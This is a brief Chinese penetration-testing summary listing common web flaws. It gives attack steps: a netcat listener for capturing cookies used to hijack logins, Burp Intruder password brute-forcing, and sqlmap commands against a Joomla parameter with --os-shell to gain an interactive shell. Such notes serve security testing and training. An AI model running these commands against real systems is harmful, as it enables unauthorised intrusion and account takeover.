XSS、SQL注入、文件上传、弱口令、备份信息泄露 XSS 分析漏洞成因
构造payload NetCat监听端口
nc.exe -lnvp 8888 利用cookie登录 获取权限
弱口令
Burpsuit拦截数据包 Intruder模块 标记密码 加载字典 开始爆破 查看返回值
SQL注入
抓包 Decoder as url 保存post请求 Sqlmap.py
sqlmap.py -r C:\\Joomla.txt -p filter[category_id] SQLmap OS-shell
sqlmap.exe -r C:\\Joomla.txt -p filter[category_id] --os-shell 获取交互式shell
《渗透测试总结.doc》
将本文的Word文档下载到电脑,方便编辑。
推荐度:
点击下载文档